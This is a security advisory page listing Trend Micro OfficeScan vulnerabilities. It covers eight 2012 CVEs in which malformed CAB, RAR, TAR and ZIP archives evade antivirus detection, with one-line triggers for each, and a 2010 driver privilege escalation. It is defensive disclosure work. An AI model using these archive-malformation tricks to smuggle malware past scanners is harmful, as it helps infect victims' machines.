The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of TrendMicro OfficeScan XG

computer vulnerability alert CVE-2012-1425 CVE-2012-1443 CVE-2012-1448

TrendMicro antivirus: bypassing via CAB, RAR, TAR, ZIP

Synthesis of the vulnerability

An attacker can create an archive containing a virus, which is not detected by TrendMicro antivirus.
Impacted products: OfficeScan, ScanMail.
Severity: 1/4.
Consequences: data flow.
Provenance: document.
Number of vulnerabilities in this bulletin: 8.
Creation date: 21/03/2012.
Identifiers: BID-52580, BID-52603, BID-52608, BID-52610, BID-52612, BID-52621, BID-52623, BID-52626, CVE-2012-1425, CVE-2012-1443, CVE-2012-1448, CVE-2012-1453, CVE-2012-1456, CVE-2012-1457, CVE-2012-1459, CVE-2012-1461, VIGILANCE-VUL-11476.

Description of the vulnerability

Tools extracting archives accept to extract archives which are slightly malformed. However, TrendMicro antivirus does not detect viruses contained in these archives.

A TAR archive containing "\50\4B\03\04" as its first 4 bytes bypasses the detection. [severity:1/4; BID-52580, CVE-2012-1425]

A RAR archive containing "MZ" as its first 2 bytes bypasses the detection. [severity:1/4; BID-52612, CVE-2012-1443]

A CAB archive containing a large "cbCabinet" field bypasses the detection. [severity:1/4; BID-52603, CVE-2012-1448]

A CAB archive containing a large "coffFiles" field bypasses the detection. [severity:1/4; BID-52621, CVE-2012-1453]

A ZIP archive starting by TAR data bypasses the detection. [severity:1/4; BID-52608, CVE-2012-1456]

A TAR archive with a large size bypasses the detection. [severity:1/4; BID-52610, CVE-2012-1457]

A TAR archive with a header containing a large value bypasses the detection. [severity:1/4; BID-52623, CVE-2012-1459]

A TAR+GZ archive containing two streams bypasses the detection. [severity:1/4; BID-52626, CVE-2012-1461]

An attacker can therefore create an archive containing a virus which is not detected by the antivirus, but which is extracted by extraction tools. The virus is then detected once it has been extracted on victim's computer.
Full Vigil@nce bulletin... (Free trial)

vulnerability 10150

Trend Micro OfficeScan: privileges elevation via TMTDI

Synthesis of the vulnerability

A local attacker can use a vulnerability of the TMTDI driver of Trend Micro OfficeScan, in order to gain system privileges.
Impacted products: OfficeScan.
Severity: 2/4.
Consequences: administrator access/rights.
Provenance: user shell.
Creation date: 24/11/2010.
Identifiers: BID-45034, VIGILANCE-VUL-10150.

Description of the vulnerability

The tmtdi.sys (Trend Micro TDI) driver is installed by the OfficeScan product.

A local attacker can use a vulnerability of the TMTDI driver of Trend Micro OfficeScan, in order to gain system privileges.
Full Vigil@nce bulletin... (Free trial)
Our database contains other pages. You can request a free trial to read them.

Display information about TrendMicro OfficeScan XG: